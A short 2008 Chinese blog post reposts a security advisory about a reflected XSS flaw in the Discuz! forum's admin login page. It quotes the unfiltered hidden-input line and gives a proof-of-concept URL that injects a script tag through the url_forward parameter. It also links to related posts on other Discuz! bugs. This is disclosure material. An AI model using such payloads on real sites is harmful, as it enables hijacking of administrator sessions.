Discuz! admincp.php xss bug | Chinadu's Blog

首页 > 技术文章 > Discuz! admincp.php xss bug

Discuz! admincp.php xss bug

2008年11月3日 Chinadu 发表评论 92 views 阅读评论

由于Discuz!的后台登陆文件$url_forward没有过滤导致一个严重的xss bug.
author: 80vul-B
team:http://www.80vul.com

漏洞存在于文件admin/login.inc.php里$url_forward没有被过滤导致xss漏洞:

<input type="hidden" name="url_forward" value="$url_forward">

poc:
http://127.0.0.1/discuz/admincp.php?url_forward=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
[管理员或版主前台登录,但未登录后台时触发]

相关文章

2008年11月5日 -- Discuz! member.php xss bug
2008年11月3日 -- Discuz! 数据库错误信息xss bug
2008年11月9日 -- Discuz! $_DCACHE数组变量覆盖漏洞
2008年11月5日 -- Discuz! 路径信息泄露 bug
2008年11月4日 -- Discuz! admin\runwizard.inc.php get-webshell bug
2008年11月3日 -- Discuz! moderation.inc.php 数据库’注射’ bug
2008年11月3日 -- Discuz! trade.php 数据库’注射’ bug
2008年11月3日 -- Discuz! cache.func.php 信息泄漏 bug
2010年03月12日 -- Discuz! 7.2 最新注入漏洞分析与利用
2010年01月9日 -- Discuz7 记录明文

分类: 技术文章标签: BUG, Discuz, XSS

评论 (0) Trackbacks (0) 发表评论 Trackback

本文目前尚无任何评论.

本文目前尚无任何 trackbacks 和 pingbacks.

Discuz! flash Csrf bug decode php